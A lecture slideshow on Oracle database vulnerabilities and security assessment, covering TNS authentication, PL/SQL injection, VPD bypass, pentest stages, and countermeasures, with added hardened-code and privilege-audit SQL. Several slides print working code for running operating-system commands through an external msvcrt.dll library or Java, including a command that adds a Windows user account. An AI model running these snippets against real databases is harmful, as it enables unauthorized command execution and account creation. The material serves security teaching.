Oracle Vulnerabilities and Security Assessment


PowerPoint Slideshow about 'Oracle Vulnerabilities and Security Assessment' - deirdra


Presentation Transcript
Outline
  • Oracle Vulnerabilities
  • Oracle Security Assessment

Information System Security - Week 10

Ways to attack

Outline
  • Oracle Vulnerabilities
    • Users/Passwords
    • PL/SQL injection
    • Running System Commands
    • Other Vulnerabilities

Users/Passwords
  • TNS protocol
  • How does Oracle authenticate users?
  • Vulnerabilities

TNS protocol

TNS protocol (cont)
  • TNS Listener is the hub of all communications in Oracle.
  • Information gathering can be done through TNS.

Diagram: Client → Listener: Connect; Listener → Client: Accept or Redirect

TNS protocol (cont)

Authentication process

  • Client → Server: Send Username
  • Server: Generates Secret Number
  • Server → Client: Send AUTH_SESSKEY
  • Client: Decrypts AUTH_SESSKEY
  • Client: Encrypts Password
  • Client → Server: Send AUTH_PASSWORD
  • Server: Compares with the password hash from database.
  • Authenticated

How about Oracle 11g

  • Client → Server: Send Username
  • Server: Generates Secret Number
  • Server → Client: Send AUTH_SESSKEY and AUTH_VFR_DATA
  • Client: Decrypts AUTH_SESSKEY
  • Client: Generates own AUTH_SESSKEY
  • Client: Combines 2 AUTH_SESSKEY
  • Client: Encrypt Password
  • Client → Server: Send AUTH_PASSWORD
  • Server: Compares with the password hash from database.
  • Authenticated

Vulnerabilities
  • Crypto Aspect
    • If we have the password (hash) → get clear text password

Vulnerabilities (cont)
  • Default Usernames/Passwords.
  • Files for passwords.
  • Brute-force.

PL/SQL Injection
  • Introduction
  • Procedures, functions
  • Triggers
  • VPD

Introduction
  • PL/SQL is the programming language built into Oracle; it extends SQL.
  • Can call external libraries (C or Java).
  • Used to create procedures, functions, triggers…

Introduction (cont)
  • Execution privileges.
    • Definer privileges: “owner” rights.
    • Invoker privileges: keyword AUTHID CURRENT_USER.
  • PL/SQL can be wrapped → when working without source, use the DESCribe feature.

Procedures
  • Similar to SQL injection.
  • PL/SQL injection can occur with a statement like this:

Select * from table_name where id='USER_INPUT'

Select * from table_name where id='XXX' UNION SELECT ….

Procedures (cont)
  • Inject a function into a PL/SQL statement.
    • Keyword: AUTONOMOUS_TRANSACTION
  • Take advantage of the rights (definer or invoker) that the functions/procedures run with.
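
The concatenation pattern from the Procedures slides next to a hardened form, as an added example that is not part of the original slides. The table APP_USERS and all three procedure names are hypothetical.

```sql
-- Added example (not from the original deck). APP_USERS and the procedure
-- names are hypothetical.

-- Vulnerable: definer rights (the default) plus string concatenation.
CREATE OR REPLACE PROCEDURE get_user_unsafe (p_id IN  VARCHAR2,
                                             p_rc OUT SYS_REFCURSOR)
IS
BEGIN
  -- p_id becomes part of the SQL text, so a quote inside it can close the
  -- literal, and whatever follows is parsed with the owner's privileges.
  OPEN p_rc FOR 'SELECT * FROM app_users WHERE id = ''' || p_id || '''';
END;
/

-- Hardened: invoker rights plus a bind variable.
CREATE OR REPLACE PROCEDURE get_user_safe (p_id IN  VARCHAR2,
                                           p_rc OUT SYS_REFCURSOR)
AUTHID CURRENT_USER              -- runs with the caller's privileges
IS
BEGIN
  -- The SQL text is constant; p_id is passed as data and is never parsed.
  OPEN p_rc FOR 'SELECT * FROM app_users WHERE id = :id' USING p_id;
END;
/

-- When an identifier has to be dynamic, a bind variable cannot carry it.
-- DBMS_ASSERT.SIMPLE_SQL_NAME raises an error unless the input is a plain
-- SQL identifier, so nothing else can reach the statement text.
CREATE OR REPLACE PROCEDURE count_rows_safe (p_table IN  VARCHAR2,
                                             p_n     OUT NUMBER)
AUTHID CURRENT_USER
IS
BEGIN
  EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM '
                    || DBMS_ASSERT.SIMPLE_SQL_NAME(p_table)
    INTO p_n;
END;
/
```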

Triggers
  • Similar to procedures/functions injection.
  • Note: Triggers run with definer rights.
  • Some real-world examples:
    • MDSYS.SDO_DROP_USER_BEFORE
    • MDSYS.SDO_GEOM_TRIG_INS1

VPD
  • VPD (Virtual Private Database) is based on a policy function.
  • Can be exploited through PL/SQL injection to drop the policy.
  • Or exploited to grant the EXEMPT ACCESS POLICY privilege.
  • Another way to defeat VPD is reading the raw file → HARD

Running System Commands
  • Through PL/SQL
  • Through Java
  • Access File System
  • Access Network

Through PL/SQL
  • Use the msvcrt.dll library to execute system commands.
  • Must have the CREATE LIBRARY privilege to register the library in Oracle.
  • Newer versions of Oracle only accept libraries in ORACLE_HOME/bin.

Through PL/SQL (cont)
CREATE OR REPLACE LIBRARY exec_shell AS 'C:\winnt\system32\msvcrt.dll';
CREATE OR REPLACE PROCEDURE oraexec (cmdstring IN CHAR)
IS EXTERNAL
  NAME "system"
  LIBRARY exec_shell
  LANGUAGE C;
EXEC ORAEXEC('NET USER MYACCOUNT PASSWORD /ADD');

Through Java
  • Does not need the CREATE LIBRARY privilege.
  • Requires:
    • Execute on all files.
    • Write File Descriptor.
    • Read File Descriptor.

Through Java (cont)
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS
import java.lang.*;
import java.io.*;
public class JAVACMD
{
  public static void execCommand (String command) throws IOException
  {
    Runtime.getRuntime().exec(command);
  }
};

Other ways
  • Using DBMS Scheduler.
  • Using Job Scheduler.
  • Using Alter System statement.

Access File System
  • Use the UTL_FILE library.
  • Need the privilege to access a DIRECTORY object or to create a new one.
  • Using Java: similar to running an OS command.
    • Needs Read and Write permission.

Access Network
  • Use UTL_TCP or UTL_HTTP.
  • Create a connection to a remote host → transfer data.

Other Vulnerabilities
  • System Configurations
    • O7_DICTIONARY_ACCESSIBILITY
    • remote_os_authent
    • dblink_encrypt_login
    • ..
  • TNS protocol settings
  • Application vulnerabilities

Other Vulnerabilities
  • Session attack
    • http://www.youtube.com/watch?v=jjRrLJEbDQU
  • Access Control bypass in Login
    • http://www.securityfocus.com/archive/1/422253

Outline
  • Oracle Vulnerabilities
  • Oracle Security Assessment

Oracle Assessment
  • Vulnerability scanning
  • Penetration testing

Vulnerability scanning
  • Look for evidence of:
    • Vulnerable software versions
    • Presence or lack of patches
    • Misconfiguration

Vulnerability assessment tool
  • Secure Oracle Auditor™ (SOA)

Penetration test
  • A penetration test (pentest) is a method of evaluating the security of a computer system or network by simulating an attack from a malicious source.

Penetration test
  • Stages:
      • Scope/Goal Definition
      • Information Gathering
      • Vulnerability Detection
      • Information Analysis and Planning.
      • Attack & Penetration/Privilege Escalation.
      • Result Analysis & Reporting.
      • Cleanup.

Information gathering
  • Footprint
    • The first and most convenient way that hackers use to gather information.
    • Includes: internet, remote access, extranet…
    • Example: whois hvaonline.net

Information gathering
  • Example:

Attack
  • SQL script

Vulnerability assessment tool
  • AppDetectivePro for Oracle
  • Metasploit

Database Services Countermeasures
  • Remove default accounts, assign strong passwords to existing accounts, and enable the audit facility for failed logins.
  • Keep the databases patched.
  • Reduce privileges, such as those granted to PUBLIC, keep privileges to a minimum, and audit access to critical tables and views.

Summary
  • Vulnerabilities usually arise from granting inappropriate privileges.
    • CREATE ANY PROCEDURE
    • CREATE ANY TRIGGER
    • CREATE ANY VIEW
    • GRANT Something to PUBLIC
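
Assessment queries for the privileges in this summary and the settings named on the earlier slides, added here as an example and not taken from the original slides. They assume read access to the DBA_* views and V$PARAMETER; DBA_USERS_WITH_DEFPWD exists only in 11g and later.

```sql
-- Added example (not from the original deck): read-only assessment queries.

-- 1. Who holds the privileges named in the summary, plus the ones the deck
--    ties to OS command execution (CREATE LIBRARY) and VPD bypass
--    (EXEMPT ACCESS POLICY)?
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege IN ('CREATE ANY PROCEDURE', 'CREATE ANY TRIGGER',
                     'CREATE ANY VIEW', 'CREATE LIBRARY',
                     'CREATE ANY LIBRARY', 'EXEMPT ACCESS POLICY')
ORDER  BY grantee, privilege;

-- 2. "GRANT something to PUBLIC": system privileges held by PUBLIC.
SELECT privilege
FROM   dba_sys_privs
WHERE  grantee = 'PUBLIC';

-- 3. PUBLIC grants on the file and network packages from the
--    "Access File System" and "Access Network" slides.
SELECT owner, table_name, privilege
FROM   dba_tab_privs
WHERE  grantee = 'PUBLIC'
AND    table_name IN ('UTL_FILE', 'UTL_TCP', 'UTL_HTTP')
ORDER  BY table_name;

-- 4. Open accounts that still have a known default password (11g and later).
SELECT u.username, u.account_status
FROM   dba_users u
JOIN   dba_users_with_defpwd d ON d.username = u.username
WHERE  u.account_status = 'OPEN';

-- 5. Configuration parameters from the "Other Vulnerabilities" slide.
--    A parameter that the running version no longer has returns no row.
SELECT name, value
FROM   v$parameter
WHERE  LOWER(name) IN ('o7_dictionary_accessibility',
                       'remote_os_authent',
                       'dblink_encrypt_login');
```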

References
  • The Oracle Hacker’s Handbook
  • The Database Hacker’s Handbook
  • http://www.petefinnigan.com/weblog/
  • http://soonerorlater.hu/index.khtml?article_id=512
